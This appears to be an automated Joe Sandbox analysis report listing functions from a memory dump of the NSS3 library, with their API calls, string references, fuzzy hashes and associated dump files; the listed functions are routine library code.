API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 366405c5880a391cc33e40904c9a9557b963a0141f5a2221561ec41da87228f6
Instruction ID: 2e5a1d0092559a4bf904b79fbdfe59b4ab1521becc6544a37f294a1f322c7ec1
Opcode Fuzzy Hash: 366405c5880a391cc33e40904c9a9557b963a0141f5a2221561ec41da87228f6
Instruction Fuzzy Hash: 35F02421A04A6C6FD7204455CF15F8633554F8131AF0A4DA0ED047BF52D249A8508380

Function 6C844DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C844E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C844E4D

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C844E38
invalid, xrefs: 6C844E25
API call with %s database connection pointer, xrefs: 6C844E2A
%s at line %d of [%.10s], xrefs: 6C844E47
misuse, xrefs: 6C844E42

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: a99b87d89cbc6eef1fe8363a93a5baaf5fc0972c4014f5d0676a6f08e9141de9
Instruction ID: 0d75233fde62582df5dbfbd5692f08ed4bcf8fe69e4d45ac5e392dd7755f49f0
Opcode Fuzzy Hash: a99b87d89cbc6eef1fe8363a93a5baaf5fc0972c4014f5d0676a6f08e9141de9
Instruction Fuzzy Hash: A1F02711E4492C6BE73004659F18FC737864B91339F0DCCA1EE0A77F93D209987152D1

Function 6C779FB0 Relevance: 12.2, APIs: 8, Instructions: 198COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C77A086
EnterCriticalSection.KERNEL32(?), ref: 6C77A09B
PR_Unlock.NSS3(?), ref: 6C77A0B7
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C77A0E9
TlsGetValue.KERNEL32 ref: 6C77A11B
EnterCriticalSection.KERNEL32(?), ref: 6C77A12F
PR_Unlock.NSS3(?), ref: 6C77A148

Part of subcall function 6C791A40: PR_Now.NSS3(?,00000000,6C7728AD,00000000,?,6C78F09A,00000000,6C7728AD,6C7793B0,?,6C7793B0,6C7728AD,00000000,?,00000000), ref: 6C791A65

Part of subcall function 6C791940: CERT_DestroyCertificate.NSS3(00000000,00000000,?,6C794126,?), ref: 6C791966

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C77A1A3

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Arena_CriticalEnterFreeSectionUnlockUtilValue$CertificateDestroy
String ID:
API String ID: 3953697463-0
Opcode ID: 45fa3fa2b6da4fedbbbc8057fe34aa33d8ba46ba7fee5469dce2773c6c23b39e
Instruction ID: b9252352a3ed84559531d1f8e7bcea77679d114550b56008867bb663d34a52c3
Opcode Fuzzy Hash: 45fa3fa2b6da4fedbbbc8057fe34aa33d8ba46ba7fee5469dce2773c6c23b39e
Instruction Fuzzy Hash: 8D51F975A002089BFF209F69DE4CAAB77B8AF4236CB154439DC1997701FB31E945C6B1

Function 6C7B0C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6C7B1444,?,00000001,?,00000000,00000000,?,?,6C7B1444,?,?,00000000,?,?), ref: 6C7B0CB3

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C7B1444,?,00000001,?,00000000,00000000,?,?,6C7B1444,?), ref: 6C7B0DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C7B1444,?,00000001,?,00000000,00000000,?,?,6C7B1444,?), ref: 6C7B0DEC

Part of subcall function 6C7D0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C772AF5,?,?,?,?,?,6C770A1B,00000000), ref: 6C7D0F1A
Part of subcall function 6C7D0F10: malloc.MOZGLUE(00000001), ref: 6C7D0F30
Part of subcall function 6C7D0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C7D0F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C7B1444,?,00000001,?,00000000,00000000,?), ref: 6C7B0DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C7B1444,?,00000001,?,00000000), ref: 6C7B0E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C7B1444,?,00000001,?,00000000,00000000,?), ref: 6C7B0E53
PR_GetCurrentThread.NSS3(?,?,?,?,6C7B1444,?,00000001,?,00000000,00000000,?,?,6C7B1444,?,?,00000000), ref: 6C7B0E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C7B1444,?,00000001,?,00000000,00000000,?), ref: 6C7B0E79

Part of subcall function 6C7C1560: TlsGetValue.KERNEL32(00000000,?,6C790844,?), ref: 6C7C157A
Part of subcall function 6C7C1560: EnterCriticalSection.KERNEL32(?,?,?,6C790844,?), ref: 6C7C158F
Part of subcall function 6C7C1560: PR_Unlock.NSS3(?,?,?,?,6C790844,?), ref: 6C7C15B2

Part of subcall function 6C78B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C791397,00000000,?,6C78CF93,5B5F5EC0,00000000,?,6C791397,?), ref: 6C78B1CB
Part of subcall function 6C78B1A0: free.MOZGLUE(5B5F5EC0,?,6C78CF93,5B5F5EC0,00000000,?,6C791397,?), ref: 6C78B1D2

Part of subcall function 6C7889E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C7888AE,-00000008), ref: 6C788A04
Part of subcall function 6C7889E0: EnterCriticalSection.KERNEL32(?), ref: 6C788A15
Part of subcall function 6C7889E0: memset.VCRUNTIME140(6C7888AE,00000000,00000132), ref: 6C788A27
Part of subcall function 6C7889E0: PR_Unlock.NSS3(?), ref: 6C788A35

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: f2932aa7cf7e01775f259f4e6fca77d8c7c333ac009c5b749a6762f93fd12958
Instruction ID: f5e38a888ec62fabadb548e156a54d515ec67db1fa1c781819866a716f790658
Opcode Fuzzy Hash: f2932aa7cf7e01775f259f4e6fca77d8c7c333ac009c5b749a6762f93fd12958
Instruction Fuzzy Hash: 1251A7F5D012015FEB10AF64EF89AAB37A8AF05258F150474ED09A7B52F731ED1487A2

Function 6C766E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?,?), ref: 6C766ED8
sqlite3_value_text.NSS3(?,?), ref: 6C766EE5
memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C766FA8
sqlite3_value_text.NSS3(00000000,?), ref: 6C766FDB
sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C766FF0
sqlite3_value_blob.NSS3(?,?), ref: 6C767010
sqlite3_value_blob.NSS3(?,?), ref: 6C76701D
sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C767052

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
String ID:
API String ID: 1920323672-0
Opcode ID: 423342cbba2911d45c5efebab447c7a6c0fa1cd7ebc8fdb4ca6cbca3c5d766bd
Instruction ID: 5f926acc5c0e6bd3f93e9766d2e95eb6a8579d3a5a14180be9fd3aba554bf6bc
Opcode Fuzzy Hash: 423342cbba2911d45c5efebab447c7a6c0fa1cd7ebc8fdb4ca6cbca3c5d766bd
Instruction Fuzzy Hash: AD61E4B1E142058BDB00CFAACA047EEB7B2AF85308F684175DC54ABF51E7319D05CBA0

Function 6C7D8F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6C7D7313), ref: 6C7D8FBB

Part of subcall function 6C7D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C778298,?,?,?,6C76FCE5,?), ref: 6C7D07BF
Part of subcall function 6C7D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7D07E6
Part of subcall function 6C7D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D081B
Part of subcall function 6C7D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D0825

SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6C7D7313), ref: 6C7D9012
SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6C7D7313), ref: 6C7D903C
SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6C7D7313), ref: 6C7D909E
PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6C7D7313), ref: 6C7D90DB
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6C7D7313), ref: 6C7D90F1

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6C7D7313), ref: 6C7D906B

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6C7D7313), ref: 6C7D9128

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
String ID:
API String ID: 3590961175-0
Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction ID: 865e10fc876283a4ecce09836916c367dae9e41b70a9d42ff0a3105db8f9325e
Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction Fuzzy Hash: C9518171A002028FEB109F6ADE58B66B3F9AF54358F164139D915D7B61EF32F804CB91

Function 6C789C50 Relevance: 12.1, APIs: 8, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 6C788850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C790715), ref: 6C788859
Part of subcall function 6C788850: PR_NewLock.NSS3 ref: 6C788874
Part of subcall function 6C788850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C78888D

PR_NewLock.NSS3 ref: 6C789CAD

Part of subcall function 6C8398D0: calloc.MOZGLUE(00000001,00000084,6C760936,00000001,?,6C76102C), ref: 6C8398E5

Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607AD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607CD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607D6
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6F204A), ref: 6C7607E4
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,6C6F204A), ref: 6C760864
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C760880
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,6C6F204A), ref: 6C7608CB
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608D7
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608FB

TlsGetValue.KERNEL32 ref: 6C789CE8
EnterCriticalSection.KERNEL32(?,?,6C78ECEC,6C792FCD,00000000,?,6C792FCD,?), ref: 6C789D01
TlsGetValue.KERNEL32(?,?,?,6C78ECEC,6C792FCD,00000000,?,6C792FCD,?), ref: 6C789D38
EnterCriticalSection.KERNEL32(?,?,6C78ECEC,6C792FCD,00000000,?,6C792FCD,?), ref: 6C789D4D
PR_Unlock.NSS3 ref: 6C789D70
PR_Unlock.NSS3 ref: 6C789DC3
PR_NewLock.NSS3 ref: 6C789DDD

Part of subcall function 6C7888D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C790725,00000000,00000058), ref: 6C788906
Part of subcall function 6C7888D0: EnterCriticalSection.KERNEL32(?), ref: 6C78891A
Part of subcall function 6C7888D0: PL_ArenaAllocate.NSS3(?,?), ref: 6C78894A
Part of subcall function 6C7888D0: calloc.MOZGLUE(00000001,6C79072D,00000000,00000000,00000000,?,6C790725,00000000,00000058), ref: 6C788959
Part of subcall function 6C7888D0: memset.VCRUNTIME140(?,00000000,?), ref: 6C788993
Part of subcall function 6C7888D0: PR_Unlock.NSS3(?), ref: 6C7889AF

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
String ID:
API String ID: 3394263606-0
Opcode ID: 9db3e407939c3d108eb8d4c21bf61ed3fcad3f5a21e5f9bdb079f823eef9ebde
Instruction ID: c95453b8dbc2666a9c0147235785aa0c2ad9cac2f1cbd6dfd19af5c9189da1aa
Opcode Fuzzy Hash: 9db3e407939c3d108eb8d4c21bf61ed3fcad3f5a21e5f9bdb079f823eef9ebde
Instruction Fuzzy Hash: 9E518F70A067059FDB00EF69C28965ABBF0BF54318F118939D9989BB01EB30E844CBE1

Function 6C889EA0 Relevance: 12.1, APIs: 8, Instructions: 136COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C889EC0
EnterCriticalSection.KERNEL32(?), ref: 6C889EF9
_PR_MD_UNLOCK.NSS3(?), ref: 6C889F73
EnterCriticalSection.KERNEL32(?), ref: 6C889FA5
_PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6C889FCF
_PR_MD_UNLOCK.NSS3(?), ref: 6C889FF2
_PR_MD_UNLOCK.NSS3(?), ref: 6C88A01D

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalEnterSection
String ID:
API String ID: 1904992153-0
Opcode ID: bf7b578c1beca74da4c4336ae0843ab96a7565ba6f38d6f34234e7f789f21d92
Instruction ID: 38bcdef4b0ee7ced5b2762b2cdfd3d01a6a6f23868166db716b9b5e734b3e24a
Opcode Fuzzy Hash: bf7b578c1beca74da4c4336ae0843ab96a7565ba6f38d6f34234e7f789f21d92
Instruction Fuzzy Hash: E851C0B2801610DBCB309F29DA8068AB7F0FF44319F158979D85997F52EB31E884CBD1

Function 6C77DCE0 Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C77DCFA

Part of subcall function 6C839DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C880A27), ref: 6C839DC6
Part of subcall function 6C839DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C880A27), ref: 6C839DD1
Part of subcall function 6C839DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C839DED

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C77DD40
CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C77DD62
CERT_DestroyCertificate.NSS3(?), ref: 6C77DD71
CERT_DestroyCertificate.NSS3(00000000), ref: 6C77DD81
CERT_RemoveCertListNode.NSS3(?), ref: 6C77DD8F

Part of subcall function 6C7906A0: TlsGetValue.KERNEL32 ref: 6C7906C2
Part of subcall function 6C7906A0: EnterCriticalSection.KERNEL32(?), ref: 6C7906D6
Part of subcall function 6C7906A0: PR_Unlock.NSS3 ref: 6C7906EB

CERT_DestroyCertificate.NSS3(?), ref: 6C77DD9E
CERT_DestroyCertificate.NSS3(?), ref: 6C77DDB7

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
String ID:
API String ID: 653623313-0
Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction ID: ccf46c778a8fbfd6057d66738cd19e972c054eb3ac7db88648b4fcd8a7de1a64
Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction Fuzzy Hash: 5A21A0B6E011299BDF219E94DE469DE77B4AF25218B180431E918A7701F721E9148BF1

Function 6C805F60 Relevance: 12.1, APIs: 8, Instructions: 64COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C80AADB,?,?,?,?,?,?,?,?,00000000,?,6C8080C1), ref: 6C805F72

Part of subcall function 6C76ED70: DeleteCriticalSection.KERNEL32(?), ref: 6C76ED8F
Part of subcall function 6C76ED70: DeleteCriticalSection.KERNEL32(?), ref: 6C76ED9E
Part of subcall function 6C76ED70: DeleteCriticalSection.KERNEL32(?), ref: 6C76EDA4

PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C80AADB,?,?,?,?,?,?,?,?,00000000,?,6C8080C1), ref: 6C805F8F
DeleteCriticalSection.KERNEL32(00000001,00000000,00000000,?,6C80AADB,?,?,?,?,?,?,?,?,00000000,?,6C8080C1), ref: 6C805FCC
free.MOZGLUE(?,?,6C80AADB,?,?,?,?,?,?,?,?,00000000,?,6C8080C1), ref: 6C805FD3
DeleteCriticalSection.KERNEL32(00000001,00000000,00000000,?,6C80AADB,?,?,?,?,?,?,?,?,00000000,?,6C8080C1), ref: 6C805FF4
free.MOZGLUE(?,?,6C80AADB,?,?,?,?,?,?,?,?,00000000,?,6C8080C1), ref: 6C805FFB
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C80AADB,?,?,?,?,?,?,?,?,00000000,?,6C8080C1), ref: 6C806019
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C80AADB,?,?,?,?,?,?,?,?,00000000,?,6C8080C1), ref: 6C806036

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalDeleteSection$DestroyMonitor$free
String ID:
API String ID: 227462623-0
Opcode ID: 937c0bbc546a8c29fa97b992d0fee6b32c1604949924be3b695ab9b41e7d3a33
Instruction ID: dd9af8dbb40632f5e98ba2f5ee67e17e2d22bfa5c47a321ba1912e3df4a0fb82
Opcode Fuzzy Hash: 937c0bbc546a8c29fa97b992d0fee6b32c1604949924be3b695ab9b41e7d3a33
Instruction Fuzzy Hash: 08214AF1604B049BEA209F75DD0DBD377A8AF4174CF100838E86AC7A40EB36E118CBA1

Function 6C773C90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,6C7E460B,?,?), ref: 6C773CA9
EnterCriticalSection.KERNEL32(?), ref: 6C773CB9
PL_HashTableLookup.NSS3(?), ref: 6C773CC9
SECITEM_DupItem_Util.NSS3(00000000), ref: 6C773CD6
PR_Unlock.NSS3 ref: 6C773CE6
CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6C773CF6
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C773D03
PR_Unlock.NSS3 ref: 6C773D15

Part of subcall function 6C81DD70: TlsGetValue.KERNEL32 ref: 6C81DD8C
Part of subcall function 6C81DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C81DDB4

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
String ID:
API String ID: 1376842649-0
Opcode ID: b4bd7b9ea39599539b81fa3f0519256b229b27ea34653e4ad3a2308a5f01146b
Instruction ID: 2704fce75326a23a2265f4ebde84702c20d85546eceb62738ab29ef38d767c07
Opcode Fuzzy Hash: b4bd7b9ea39599539b81fa3f0519256b229b27ea34653e4ad3a2308a5f01146b
Instruction Fuzzy Hash: 0F112C7AE401196BDF211B38AE0D8AA7A78EB0325CB150530ED1887B11FB22ED58C7E1

